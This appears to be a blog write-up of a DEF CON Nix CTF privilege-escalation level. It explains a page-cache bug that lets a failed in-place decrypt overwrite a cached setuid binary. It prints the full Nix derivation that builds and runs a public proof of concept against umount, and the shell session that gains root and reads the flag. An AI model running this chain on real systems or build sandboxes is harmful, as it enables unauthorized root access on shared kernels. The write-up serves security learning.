· · 8 min read

A page-cache bug the Nix sandbox can't contain

A decryption can fail and still leave the file it read changed. The move that lands root isn't reading the dropped binary - it's reading what the recipe retargets.

A decryption can fail and still leave the file it read changed. Here’s how.

When a program reads a file, the kernel keeps those pages cached in memory; the next read comes from RAM, not disk. Hand the kernel a broken authenticated-decrypt request (the kind that checks a tag at the end and is supposed to refuse if the bytes don’t verify), but arrange its input and output to point at the same cached pages. The decrypt runs in place, writing its “plaintext” over the source before it checks the tag. The tag fails, so the call returns an error, but the write already happened. “Authentication failed” is the return value; it is not a description of what happened to the file. The mutated bytes sit in the page cache, and every read after that sees them.

Now pick the file carefully: a setuid-root program the kernel runs with root privileges because its on-disk inode says so. You can’t write to it (the permissions won’t let you), but you just wrote to its cached copy, through a path that never consulted them. On disk the inode is untouched; in memory, its executable pages are yours. Run it: the kernel reads the inode, sees setuid-root, hands over root credentials, then runs the instructions in the cache, the ones you put there. Two layers disagree for one window.

The write that shouldn’t count
One decrypt request, in order
splice() the file’s cached pages
the same pages become both the ciphertext in and the plaintext out
↓
in-place decrypt writes the page cachethe store
4 attacker bytes land in RAM, mid-request
↓
auth tag check fails → returns an errortoo late
the write already happened

“Authentication failed” is a return value, not a verdict on the file. The write already landed, and every read after sees it.

Why root falls out
execve() trusts two layers
on-disk inode
setuid root · never written
grants the privilege
page cache (RAM)
holds the attacker’s bytes
supplies the instructions
↓↓
execve() the setuid file
→ root shell running your code

Privilege comes from the inode; the instructions come from the cache.

Schematic. The real write lands 4 bytes at a time, 406 times, to fill a 1624-byte payload.

A bug the build sandbox can’t contain

Here’s why that bug isn’t only a kernel curiosity. A Nix build runs arbitrary code, and the sandbox around it is just Linux namespaces over one shared kernel. For a bug like this the namespace isn’t the boundary: the pages are shared, the kernel is shared, and the exploit never has to leave the box it was handed.

I’m not the only one who reads it that way. At DEF CON, Tristan Ross (an engineer at Determinate Systems, a Nix company) took the stage to name this exact bug class, opening with “builds run as code,” and copy fail and dirty frag as his examples. The defense he’s building is covered in part two.

A DEF CON talk slide reading 'builds run as code,' naming copy fail and dirty frag as examples of page-cache bugs the Nix sandbox cannot contain
Determinate Systems' Tristan Ross, on stage: 'these problems are not preventable by the Nix sandbox.' Talk: Securing Nix Builds using microVMs.

Reading the target out of the recipe

At the NixVegas CTF (a Nix-built capture-the-flag at DEF CON), the first Erinyes privilege-escalation box came with one line of story: this box was compromised once; think you can figure out how? The home directory held the leftovers from that compromise: a copyfail.nix, a prebuilt copyfail, and the payload/payload.h it works with.

My first reflex was the wrong one: treat the leftovers like a forensics artifact and read the flag out of them. But a sanctioned box that says “use any means necessary” isn’t asking you to read the exploit; it’s asking you to run it. And the move that actually mattered was small: recognizing that the truth lived in what the recipe retargets, not in what the binary’s strings say about themselves.

strings on the dropped binary is the cheap first look, and here it’s a trap worth naming: the ELF names /usr/bin/su, so su reads like the target. It isn’t: that’s only the exploit’s argv default, the value it falls back to when nobody says otherwise, and the challenge never runs it that way. So skip the binary and read the recipe. That’s where the target actually gets chosen.

1
target = lib.getExe' util-linux.mount "umount";

The recipe reaches into the package graph, pulls out umount, and a postPatch rewrites the literal "su" in the source to that target:

1
2
3
4
postPatch = ''
  substituteInPlace exploit.c \
    --replace-fail '"su"' 'target'
'';

The binary’s string says su; the build’s argument says umount. The compiled-in string is a fossil of what the source once said; the derivation is what actually ran.

What the binary says
$ strings copyfail
/usr/bin/su
authencesn(hmac(sha256),cbc(aes))
…-bash-interactive-5.3p9/bin/sh
set dressing · argv default

Confident, and pointing the wrong way: it only means su when nobody says otherwise, and the challenge never does.

What the build targets
copyfail.nix
target = lib.getExe'
  util-linux.mount "umount"
postPatch: "su" → target
the decision · what actually runs

The recipe reaches into the package graph, pulls out umount, and rewrites the source’s "su" to it.

su → umount
Same binary, two readings. When they disagree, the build is the one telling the truth; the strings are set dressing pointing the other way.

The strings are real; they’re the exploit’s defaults, not this challenge’s target.

The exploit itself is fetched, not written here. The derivation pins Tony Gies’ copy-fail-c to one revision and hash and stays short precisely because every dangerous line lives upstream. The pwnPhase runs copyfail $target </dev/null || true, allowing the phase to continue if the exploit exits nonzero. Nix still rejects the build because it produces no $out, but the page-cache write may already have landed. When debugging the silent su in the next level, remove || true and capture $? immediately after the command to preserve its exit status.

Landing root from there is a chain, not a single shot, and the constraint that shapes it is that you can’t open a setuid file as your splice source. Point the dropper straight at the setuid umount wrapper and it just returns Permission denied; you can’t even read it (-r-s--x--x), let alone corrupt it. So you point it at something you can read (a world-readable ELF you own, the payload), which drops you into an unprivileged shell. The root hop is separate. When you run /run/wrappers/bin/umount, the wrapper execs the real umount out of the store, and that binary’s cached pages were already overwritten by an earlier copyfail aimed straight at it. The page-cache write is system-wide; it outlives the failed build. The wrapper loads shellcode you planted through a path that never had write permission, runs it with the root the setuid bit grants, and hands you a shell. The minimal shell has no cat, so the flag comes out through a bash redirection builtin:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
[ctf@nixos:~]$ ./copyfail /run/wrappers/bin/umount
open(/run/wrappers/bin/umount): Permission denied

[ctf@nixos:~]$ ./copyfail ./payload
[+] target:    ./payload
[+] payload:   1624 bytes (406 iterations)
[+] page cache mutated; exec'ing target
sh-5.3$ /run/wrappers/bin/umount     # execs the store umount whose pages an earlier copyfail corrupted
sh-5.3$                              # prompt flips $ → # : euid 0
sh-5.3$ printf '%s\n' "$( < /root/flag.txt )"
Nix{78bd2f87ab2794ff}

The exploit was written to escalate through su; the setuid door I actually had was the umount wrapper.

To be clear about what this level was: it’s a public CVE with a public PoC (Tony Gies’ copy-fail-c, published as CVE-2026-31431), at a sanctioned CTF, and the challenge handed me the derivation.

The copyfail derivation, verbatim

Here’s the derivation the challenge handed me, unedited:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
{ lib, pkgsStatic, stdenvNoCC, fetchFromGitHub, bash, xxd, util-linux }:
let
  target = lib.getExe' util-linux.mount "umount";
  copy-fail-c = pkgsStatic.stdenv.mkDerivation {
    pname = "copy-fail-c"; version = "0.1";
    outputs = [ "out" "payload" ];
    nativeBuildInputs = [ xxd ];
    src = fetchFromGitHub {
      owner = "tgies"; repo = "copy-fail-c";
      rev = "925f1a2d13f9a19297e249666ce3e40034fa87cc";
      hash = "sha256-yl915VpY9fL7W43XlZImLkZVSqOxv6VdZEuPyvUNw0A=";
    };
    postPatch = ''
      substituteInPlace exploit.c \
        --replace-fail '"/bin/sh"' '"${lib.getExe' bash "sh"}"' \
        --replace-fail '"su"' 'target'
      substituteInPlace payload.c \
        --replace-fail '"/bin/sh"' '"${lib.getExe' bash "sh"}"'
    '';
    installPhase = ''
      runHook preInstall
      mkdir -p $out/bin; cp exploit $out/bin/copyfail
      mkdir -p $payload/bin $payload/include
      cp payload $payload/bin/payload
      xxd -i payload > $payload/include/payload.h
      runHook postInstall
    '';
  };
in stdenvNoCC.mkDerivation (finalAttrs: {
  name = "copyfail";
  phases = [ "pwnPhase" ];
  nativeBuildInputs = [ util-linux.bin copy-fail-c ];
  inherit target;
  pwnPhase = ''
    runHook prePwn
    copyfail $target </dev/null || true
    runHook postPwn
  '';
})

A .nix that opens { lib, pkgsStatic, … } is a function, not a package, so nix-build ./copyfail.nix fails outright. You feed it the matching nixpkgs bindings by hand with callPackage:

1
nix-build -E 'with import <nixpkgs> {}; callPackage ./copyfail.nix {}'

That’s one of three answers to the question the whole box asks: which binary did the build actually produce? This rung answered it by reading a recipe someone else wrote. The next level hands you only a name and no recipe, so writing the recipe yourself is part two.

Share